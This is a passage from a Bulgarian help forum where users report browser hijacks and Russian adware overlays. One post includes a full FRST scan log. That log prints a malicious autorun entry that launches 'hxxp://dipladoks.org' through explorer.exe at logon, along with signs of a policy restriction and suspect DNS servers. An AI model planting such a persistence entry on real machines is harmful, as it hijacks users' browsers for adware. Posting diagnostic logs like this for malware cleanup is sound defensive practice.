       И така до безкрайност. Писах "Chromium" в търсачката на компютъра (едно кученце). То търси, търси, чете някакви книжки, гледа с една лупа и накрая ми показа къде стоят файловете на този ми ти Chromium. Изтрих ги, нямаше никакъв ефект. После с Ctrl+alt+del влязох в "Процеси" и от там изтрих редовете на които пишеше chromium.exe. Тук беше и най-големият ми напредък, щото историята от Chrome + видео файловете отваряни откакто този компютър е станал компютър ги нямаше. Обаче остана това, че всеки път като включа компютъра и ми изкача нов прозорец в Chromium, ами освен това усещам как ми бави и самият Chrome - той е браузърът ми по подразбиране. Само да вметна, деинсталирах BS Player, Google Chrome, Mozilla Firefox, Avast също махнах за малко, барем се оправи, но не постигнах желаният от мен ефект. В темата която постнах по-горе от човека със същия проблем, пробвах да изтегля препоръчаният му fixlist, обаче ми дава грешка в страницата. Аз даже първо мислех, да си постна проблема там като коментар, ама викам айде да не спамя на човека темата, по-добре сякаш да отворя нова. Пък ако модераторите решат, че темата ми нещо е извън правилата, моля да бъда извинен за невежеството си. Та общо взето това е, бих се радвал на всякаква помощ. Лека вечер от мен!
       
    • от Fabry
      През няколко минути се появява странно съобщение от системата - на прикачената снимка е . Ако някой помогне, ще съм задължен !

    • от jega96
      Здр-те на всички от форома,можели да ми кажете заразен ли съм със някакъв вирус,защото преди няколко седмици ми излезе грешка на декстапа ми изтрих я и сега неми се явява вече общо казано,принципно не ползвам антивирусни програми,не влизам кой знае каде,за да хвана вирус,ама все пак да ми отговорите,как съм със ОС,като цяло мерси предварително.

      FRST.txt
      Addition.txt
    • от The Negative One
      Та пуснах вече една тема - хората ме пратиха тук.Ситуацията е следната - При всяко включване на компютъра Google Chrome автоматично се е пуснал и е отворил някакъв сайт с глупости на руски език."Получи предсказание от Ванга" и прочие простотии.Та опитах да изчистя кеша и да рестартирам настройките на браузъра, но не постигнах ефект.Ще се радвам ако някой може да помогне!
      Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 09.12.2018
      Ran by SHANOVr (administrator) on DESKTOP-4AUH82I (13-12-2018 12:11:15)
      Running from D:\Camera\downloads D
      Loaded Profiles: SHANOVr (Available Profiles: defaultuser0 & SHANOVr)
      Platform: Windows 10 Pro Version 1709 16299.125 (X64) Language: English (United States)
      Internet Explorer Version 11 (Default browser: Chrome)
      Boot Mode: Normal
      Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
      ==================== Processes (Whitelisted) =================
      (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
      (Intel Corporation) C:\Windows\System32\igfxCUIService.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
      (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
      (Hi-Rez Studios) D:\SteamGammEZ\HiPatchService.exe
      (Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1812.3-0\MsMpEng.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
      (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
      (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler.exe
      (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler64.exe
      (Intel Corporation) C:\Windows\System32\igfxEM.exe
      (Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
      (Microsoft Corporation) C:\Windows\System32\dllhost.exe
      (Microsoft Corporation) C:\Windows\System32\smartscreen.exe
      () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.35.76.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
      (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
      (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
      (f.lux Software LLC) C:\Users\SHANOVr\AppData\Local\FluxSoftware\Flux\flux.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1812.3-0\NisSrv.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (ASUSTek) C:\Program Files (x86)\ASUS\GPU TweakII\ASUSGPUFanService.exe
      (Microsoft Corporation) C:\Windows\System32\dllhost.exe
      ==================== Registry (Whitelisted) ===========================
      (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
      HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [630168 2017-09-29] (Microsoft Corporation)
      HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13671792 2014-03-14] (Realtek Semiconductor)
      HKLM-x32\...\Run: [VirtualCloneDrive] => D:\CloneDrive\VirtualCloneDrive\VCDDaemon.exe [88984 2013-03-10] (Elaborate Bytes AG)
      HKU\S-1-5-21-392342708-715023771-1080359625-1001\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3131680 2018-11-26] (Valve Corporation)
      HKU\S-1-5-21-392342708-715023771-1080359625-1001\...\Run: [f.lux] => C:\Users\SHANOVr\AppData\Local\FluxSoftware\Flux\flux.exe [1820168 2018-10-24] (f.lux Software LLC)
      HKU\S-1-5-21-392342708-715023771-1080359625-1001\...\Run: [EpicGamesLauncher] => D:\boiii\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32973712 2018-07-26] (Epic Games, Inc.)
      HKU\S-1-5-21-392342708-715023771-1080359625-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [49803328 2018-09-10] (Skype Technologies S.A.)
      HKU\S-1-5-21-392342708-715023771-1080359625-1001\...\Run: [SHANOVr] => explorer.exe hxxp://dipladoks.org <==== ATTENTION
      HKU\S-1-5-21-392342708-715023771-1080359625-1001\...\MountPoints2: {5911fcb2-a851-11e8-a4da-fcaa14184561} - "F:\EuroTruckSimulator2_setup.exe" 
      GroupPolicy: Restriction ? <==== ATTENTION
      ==================== Internet (Whitelisted) ====================
      (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
      Tcpip\Parameters: [DhcpNameServer] 66.117.6.114 180.76.76.76
      Tcpip\..\Interfaces\{b2172693-d883-4ed3-8b20-1cd27a17c8d4}: [DhcpNameServer] 192.168.42.129
      Tcpip\..\Interfaces\{ed733950-9206-4498-b0d2-848e150b2288}: [NameServer] 8.8.8.8,8.8.4.4
      Tcpip\..\Interfaces\{ed733950-9206-4498-b0d2-848e150b2288}: [DhcpNameServer] 66.117.6.114 180.76.76.76
      Internet Explorer:
      ==================
      SearchScopes: HKU\S-1-5-21-392342708-715023771-1080359625-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
      FireFox:
      ========
      FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll [2017-05-20] ()
      FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll [2017-05-20] ()
      FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-10-11] (NVIDIA Corporation)
      FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-10-11] (NVIDIA Corporation)
      FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-17] (Google Inc.)
      FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-17] (Google Inc.)
      Chrome: 
      =======
      CHR Profile: C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default [2018-12-13]
      CHR Extension: (Slides) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-13]
      CHR Extension: (Docs) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-13]
      CHR Extension: (Google Drive) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-01-22]
      CHR Extension: (YouTube) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-22]
      CHR Extension: (Adblock Plus) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2018-12-12]
      CHR Extension: (Block Site - Website Blocker for Chrome™) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\eiimnmioipafcokbfikbljfdeojpcgbh [2018-11-19]
      CHR Extension: (Sheets) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-13]
      CHR Extension: (Google Docs Offline) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-16]
      CHR Extension: (AdBlock) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2018-12-11]
      CHR Extension: (Chrome Web Store Payments) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
      CHR Extension: (Gmail) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-01-22]
      CHR Extension: (Chrome Media Router) - C:\Users\SHANOVr\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-10-20]
      ==================== Services (Whitelisted) ====================
      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
      S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7211968 2018-08-07] ()
      S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [775296 2018-04-16] (EasyAntiCheat Ltd)
      U2 HiPatchService; D:\SteamGammEZ\HiPatchService.exe [9728 2017-09-19] (Hi-Rez Studios) [File not signed]
      R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [365040 2017-10-20] (Intel Corporation)
      R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [773160 2018-10-10] (NVIDIA Corporation)
      S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [773160 2018-10-10] (NVIDIA Corporation)
      S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4329952 2017-12-14] (Microsoft Corporation)
      R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\NisSrv.exe [3880120 2018-12-10] (Microsoft Corporation)
      R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1812.3-0\MsMpEng.exe [114208 2018-12-10] (Microsoft Corporation)
      R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000 
      R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
      ===================== Drivers (Whitelisted) ======================
      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
      S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
      R4 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [35352 2017-01-11] (ASUSTeK Computer Inc.)
      R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f4187dc256a67a6b\nvlddmkm.sys [20337064 2018-10-12] (NVIDIA Corporation)
      S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30792 2018-08-21] (NVIDIA Corporation)
      R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [69544 2018-06-08] (NVIDIA Corporation)
      R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [65792 2018-04-24] (NVIDIA Corporation)
      R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [604160 2017-09-29] (Realtek )
      S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
      S3 ssudserd; C:\WINDOWS\system32\DRIVERS\ssudserd.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
      S3 usbrndis6; C:\WINDOWS\System32\drivers\usb80236.sys [23040 2017-09-29] (Microsoft Corporation)
      S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46680 2018-12-10] (Microsoft Corporation)
      R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [330936 2018-12-10] (Microsoft Corporation)
      R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [62136 2018-12-10] (Microsoft Corporation)
      R3 XtuAcpiDriver; C:\WINDOWS\System32\drivers\XtuAcpiDriver.sys [63840 2015-06-06] (Intel Corporation)
      ==================== NetSvcs (Whitelisted) ===================
      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      ==================== One Month Created files and folders ========
      (If an entry is included in the fixlist, the file/folder will be moved.)
      2018-12-12 15:59 - 2018-12-12 15:59 - 000000000 ____D C:\Users\SHANOVr\AppData\Roaming\Google
      2018-11-28 00:07 - 2018-11-21 15:41 - 000715172 _____ C:\Users\SHANOVr\Desktop\Scan2.TIF
      ==================== One Month Modified files and folders ========
      (If an entry is included in the fixlist, the file/folder will be moved.)
      2018-12-13 12:11 - 2017-04-22 22:42 - 000000000 ____D C:\FRST
      2018-12-13 12:10 - 2018-01-20 22:10 - 001425282 _____ C:\WINDOWS\system32\PerfStringBackup.INI
      2018-12-13 12:07 - 2017-01-22 20:01 - 000000000 ____D C:\ProgramData\NVIDIA
      2018-12-13 12:06 - 2018-01-20 22:09 - 000003098 _____ C:\WINDOWS\System32\Tasks\GPU Tweak II
      2018-12-13 12:05 - 2018-01-20 21:57 - 000000000 ____D C:\Users\SHANOVr
      2018-12-13 12:05 - 2017-01-22 20:15 - 000000000 __SHD C:\Users\SHANOVr\IntelGraphicsProfiles
      2018-12-13 12:05 - 2017-01-22 19:52 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
      2018-12-13 12:04 - 2018-01-20 22:09 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
      2018-12-13 12:04 - 2018-01-20 21:53 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
      2018-12-13 09:26 - 2017-09-29 15:46 - 000000000 ___HD C:\Program Files\WindowsApps
      2018-12-13 09:26 - 2017-09-29 15:46 - 000000000 ____D C:\WINDOWS\AppReadiness
      2018-12-13 09:25 - 2017-09-29 15:46 - 000000000 ____D C:\WINDOWS\DeliveryOptimization
      2018-12-12 22:54 - 2017-01-22 20:18 - 000000000 ____D C:\Program Files\Steam
      2018-12-12 09:13 - 2017-02-28 08:33 - 000000000 ____D C:\Users\SHANOVr\AppData\Roaming\AIMP3
      2018-12-12 08:46 - 2017-01-23 13:27 - 000592616 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
      2018-12-10 22:50 - 2018-02-04 12:48 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
      2018-12-06 09:16 - 2018-01-20 21:58 - 000000000 ____D C:\Users\SHANOVr\AppData\Local\Packages
      2018-12-03 10:25 - 2018-01-20 22:09 - 000003378 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-392342708-715023771-1080359625-1001
      2018-12-03 10:25 - 2017-01-22 19:50 - 000002369 _____ C:\Users\SHANOVr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
      2018-11-29 08:12 - 2017-01-27 15:27 - 000000000 ____D C:\Users\SHANOVr\AppData\Local\CrashDumps
      2018-11-27 23:57 - 2017-01-22 19:52 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
      2018-11-27 23:57 - 2017-01-22 19:52 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
      2018-11-23 12:33 - 2018-10-19 09:15 - 000000000 ____D C:\Users\SHANOVr\AppData\Local\ElevatedDiagnostics
      ==================== Files in the root of some directories =======
      2017-02-06 20:32 - 2017-02-06 20:32 - 000000017 _____ () C:\Users\SHANOVr\AppData\Local\resmon.resmoncfg
      ==================== Bamital & volsnap ======================
      (There is no automatic fix for files that do not pass verification.)
      C:\WINDOWS\system32\winlogon.exe => File is digitally signed
      C:\WINDOWS\system32\wininit.exe => File is digitally signed
      C:\WINDOWS\explorer.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
      C:\WINDOWS\system32\svchost.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
      C:\WINDOWS\system32\services.exe => File is digitally signed
      C:\WINDOWS\system32\User32.dll => File is digitally signed
      C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
      C:\WINDOWS\system32\userinit.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
      C:\WINDOWS\system32\rpcss.dll => File is digitally signed
      C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
      C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
      C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
      LastRegBack: 2018-12-08 22:12
      ==================== End of FRST.txt ============================
       
      Addition.txt
    • от roggoto
      Здравейте!
      Ползвам Google Chrome, но от известно време, докато не ми стана трън в очите и не ми пречеше, се появиха едни и същи реклами/банери на руски, показващи някакви абсолютни глупости, понякога и порнографски снимки върху оригиналните реклами, за които е платено да се появят в интернет пространството! Който и сайт да отворя те веднага покриват местата за платените реклами върху оригиналните, които трябва да се появят там! Докато днес си пуснах видео в един сайт на БГ телевизия и видях, че се появяват върху самото видео като по този начин ми блокират и функциите на видеото за спиране , пускане, увеличаване на екрана (прикачил съм снимка)! Някой, ако знае как да спра/премахна тази досада, ще съм благодарен да сподели!

      Addition.txt
      FRST.txt
  • Дарение

×

Информация

Поставихме бисквитки на устройството ви за най-добро потребителско изживяване. Можете да промените настройките си за бисквитки, или в противен случай приемаме, че сте съгласни с нашите условия за ползване.